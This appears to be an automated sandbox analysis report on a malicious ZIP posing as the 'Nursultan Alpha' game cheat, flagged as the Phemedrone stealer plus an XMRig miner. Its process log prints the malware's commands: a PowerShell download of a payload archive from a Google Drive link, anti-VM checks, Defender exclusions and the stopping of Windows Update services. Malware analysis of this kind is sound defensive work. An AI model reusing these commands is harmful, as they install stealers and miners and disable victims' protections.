Analysis Overview
SHA256
80b5ec95630e41ab434aa5173bf0e01d649c988c8a808f5c6dc9f5429ec6dea9
Threat Level: Known bad
The file Nursultan Alpha By Fleshk.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
Phemedrone
XMRig Miner payload
Creates new service(s)
Drops file in Drivers directory
Stops running service(s)
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
UPX packed file
Power Settings
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Launches sc.exe
Hide Artifacts: Ignore Process Interrupts
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix
Analysis: static1
Detonation Overview
| Field | Value |
| Reported | 2024-06-27 18:35 |
Signatures
Analysis: behavioral3
Detonation Overview
| Field | Value |
| Submitted | 2024-06-27 18:35 |
| Reported | 2024-06-27 18:38 |
| Platform | win7-20240611-en |
| Max time kernel | 146s |
| Max time network | 142s |
Command Line
Signatures
Phemedrone
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe | N/A |
| N/A | N/A | C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1000 set thread context of 2888 | N/A | C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe | C:\Windows\system32\conhost.exe |
| PID 1000 set thread context of 2792 | N/A | C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe | C:\Windows\system32\svchost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5144E551-34B4-11EF-B477-E6415F422194} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0fd7aefc0c8da01 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\doskey.exe
doskey CD=RECOVER
C:\Windows\system32\doskey.exe
doskey TYPE=ROBOCOPY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1uH0vQ_juAop0fqiOEIdPBdq1AMQmvndT&export=download', 'C:\Users\Admin\AppData\Local\Temp\java.rar')"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\doskey.exe
doskey TITLE=RENAME
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\assets\UnRAR.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\assets\unrar.exe" x -p1512okul -o+ "C:\Users\Admin\AppData\Local\Temp\java.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe"
C:\Windows\system32\mshta.exe
mshta
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\rundll32.exe
rundll32
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2928 -s 1796
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "RLNALEWN"
C:\Windows\system32\sc.exe
